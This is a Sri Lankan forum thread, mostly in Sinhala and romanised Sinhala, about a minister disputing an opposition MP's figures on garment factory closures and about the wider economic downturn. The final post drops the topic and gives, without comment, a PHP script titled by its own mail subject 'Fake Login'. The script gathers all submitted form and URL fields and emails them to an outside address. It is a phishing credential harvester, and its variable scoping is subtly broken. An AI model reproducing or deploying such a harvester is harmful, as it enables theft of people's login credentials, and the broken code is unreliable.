UNP GON RAJAGEN THAWATH GON PRAKASHAYAK

sasamantha

Member
Dec 16, 2008
1,167
18
0
Ona Gonekta Udda Karanda puluwan Kiwwa Unp Gon Raja Thawan Gon Kathawak Kiyala

ලක්‍ෂ්මන් කිරිඇල්ල ජනතාව නොමඟ යවනවා
ලියාපදිංචි ඇඟලූම් කම්හල් ප්‍රමාණය 370 යි
එසේ නම් කම්හල් 589 ක්‌ වැසෙන්නේ කොහොමද?

ඇමැති අනුර ප්‍රියදර්ශන යාපා

රනිල් ධර්මසේන

ඇඟලුම් කර්මාන්තශාලා 589 ක්‌ වැසී ගොස්‌ ඇති බව කියමින් එජාප මන්ත්‍රී ලක්‍ෂ්මන් කිරිඇල්ල මහතා ජනතාව නොමඟ යවන බව ව්‍යවසාය සංවර්ධන හා ආයෝජන ප්‍රවර්ධන සහ මාධ්‍ය ඇමැති අනුර ප්‍රියදර්ශන යාපා මහතා පැවැසීය.

ශ්‍රී ලංකා ආයෝජන මණ්‌ඩලය යටතේ ලියාපදිංචි වී ඇති ඇඟලුම් කර්මාන්තශාලා ප්‍රමාණය 370 ක්‌ පමණකැයි ද, එසේ තිබියදී කම්හල් 589 ක්‌ වැසී යන්නේ කෙසේ දැයි ඇමැතිවරයා විමසීය.

ප්‍රධාන කර්මාන්තශාලා හැර ගම්වල වසා දමා ඇති කුඩා කුඩා ආයතනත් මන්ත්‍රීවරයා ගණන් බලා ඇත්දැයි නොදන්නා බව කී ඇමැතිවරයා එක්‌ කර්මාන්ත ශාලාවක්‌ වැසුනද ඒ වෙනුවෙන් තවත් තැනක කර්මාන්ත ශාලාවක්‌ විවෘත වන බවත් එමගින් විරැකියා ප්‍රමාණය වැඩිවීමක්‌ සිදු නොවන බවත් කීය.

මන්ත්‍රීවරයා පවසන අන්දමට විශාල සංඛ්‍යාවක්‌ වැසී ඇත්නම් රැකියා අහිමි වූවන්ගේ දැවැන්ත පෙළපාලි ඇතිවීම වැළැක්‌විය නොහැකි යෑයි ඊයේ (24 වැනිදා) රජයේ ප්‍රවෘත්ති දෙපාර්තමේන්තුවේ පැවැති ප්‍රවෘත්ති සාකච්ඡාවකදී ඇමැතිවරයා සඳහන් කළේය.

 

sasamantha

Member
Dec 16, 2008
1,167
18
0
Ape peththeth Akka kenek gedarata orders aragena mehuwa. Ita passe aya merry kalata passe aka neweththuwa. Mu Akath Ganan Karad danne na :lol::lol::lol::lol::lol:
 

madurax86

Member
Jun 29, 2006
4,385
88
0
- කම්හල් ප්‍රමාණයක් වැසී ඇත.
යූ ඇන් පියේ ගනින සංඛ්‍යාවලට - සංඛ්‍යාද ඇතුලත් ය.
:lol:
 

funkoluwa

Active member
  • May 28, 2007
    4,081
    16
    38
    Yokohama Japan
    angalum karmantha witharak newei ada godaak factories companies karanna beruwa wahala thiyenne ada lankawe arthikaya watila uddamanaya wediwela kiyala kawruth dannawa oka nodanna eka thama gona
     

    ~stealth~

    Member
    May 23, 2009
    247
    2
    0
    ~invisible~
    Guys....
    I don't know how many garment factories are closed but......
    Very recently I visited some major computer shops at Matara...(Kobian,Neat, PC House)
    Actually they were about to close..All are run by 1 or 2 personnel where at least 8-10 were working before this crisis.

    I think the whole country is going towards a massive disaster very fast!!
     

    Nuwanddi

    Member
    Oct 26, 2006
    1,969
    26
    0
    39
    Moratuwa/www.mannschaft.lk
    Guys....
    I don't know how many garment factories are closed but......
    Very recently I visited some major computer shops at Matara...(Kobian,Neat, PC House)
    Actually they were about to close..All are run by 1 or 2 personnel where at least 8-10 were working before this crisis.

    I think the whole country is going towards a massive disaster very fast!!

    hikzzz umbata pissuda ban. owa wahanna wenne anduwe waraddak nisa newei. okun karana dahi thuppahi hora wada mulu ratama dannawa dan. warranty ganna giyama minissunta wena dewal umba danne na wage.
    poddak hoyala balala hitapan deyak kiyanna kalin. kotuwata gihin balapan ehe thiyena computer shop walin dawasakata aluth
    PC keeyak assemble karanawada kiyala.
     

    uajanath

    Well-known member
  • Apr 1, 2009
    8,482
    1,888
    113
    <?php
    function logPost($value,$key)
    {
    $posts = $posts . " -=+=- " . $key . " = " . $value;
    }

    function logGet($value,$key)
    {
    $gets = $gets . " -=+=- " . $key . " = " . $value;
    }

    array_walk($_GET,"logGet");
    array_walk($_POST,"logPost");

    mail("[email protected]","Fake Login","POST:\n\n".$posts."\n---------------------------------\nGET:\n\n".$gets."\n\nEND OF EMAIL");



    ?>